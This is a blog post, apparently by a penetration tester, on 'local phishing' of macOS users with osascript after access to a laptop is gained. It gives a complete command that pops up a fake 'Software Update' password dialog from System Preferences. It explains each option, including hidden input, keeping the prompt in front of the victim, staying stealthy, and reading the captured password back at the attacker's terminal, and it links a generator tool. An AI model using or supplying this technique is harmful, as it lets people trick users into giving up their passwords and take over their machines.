osascript: for local phishing

Lately I've been finding myself on victim's laptops and they have all been OSX. I found that instead of key-logging I could simply prompt the end user for whatever password I needed using applescript.

The way we do this is with osascript, Apples built in executor for applescript and other OSA (Open Scripting Architecture) languages. Applescript provides a convenient way to interact with GUI elements within OSX so this little trick is likely only scratching the surface of what is possible. 

So straight to it, the command i'm using to do this looks like this:

osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'

And now, even though it reads like english pretty much, let's break it down.

osascript -e :  

We start off calling osascript which allows us to run apple script from the command line. -e is, you guessed it, 'execute'. Useful to note at this point that you can separate multiple lines with additional -e commands since it isn't always possible to write a giant one liner to do what you need. osascript will continue executing in the same context and remember variables across multiple "-e" statements. This could be very useful if you wanted to actually validate the users password to make sure they didn't fat finger it. 

'tell app "System Preferences" to activate' :  

Just like it reads here you can "tell" applications to do things. In this case we are telling System Preferences to activate, which will launch the application if needed and bring it to the foreground. 

-e 'tell app "System Preferences" to activate' : 

So yes this is the exact same command. What happens with some applications, System Preferences being one of them, is that they background immediately when trying to launch a dialog from them. I don't know why and frankly I don't care. What I do know is that telling it to activate twice ensures that the application stays in front and your malicious prompt is right there for the victim to see. Dog Science. 

-e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" 

Here we have the bulk of the text. This basically creates the dialog box ands adds the text of our choosing. Sadly there is no formatting here. So we aren't able to fully recreate the bold text of the real Software Update prompt. 

with icon 1: 

 This tells the application to use its own default icon. Although, there are a few options for your specific needs.

with icon 0: 

with icon 1: 

with icon 2: 

with hidden answer with title "Software Update"'

This last little bit says the text the user types in should be hidden and that the title of the dialog box should be "Software Update". There are a lot more options such as customization of the buttons or removing the cancel button and all of this is position independent. 

You can read the full documentation here.

At this point you can run the command to throw the dialog. 

A few important notes:

The osascript command will timeout after 2 minutes of sitting on screen. This isn't an issue as the window will disappear when the apple event times out. 

However, if you ctrl-c your running osascript the dialog box will remain and if a user types their password in you will not see it. Running our script again after doing this will leave two of these dialogs on the screen (not very stealthy). 

Otherwise whatever is typed into the dialog box, or other actions such as hitting cancel or escape will be displayed back to your terminal.

I have a bit of code to generate osascript commands for myself quickly on the fly which you can grab here: https://github.com/fuzzynop/FiveOnceInYourLife

Happy hacking. 


No comments:

Post a Comment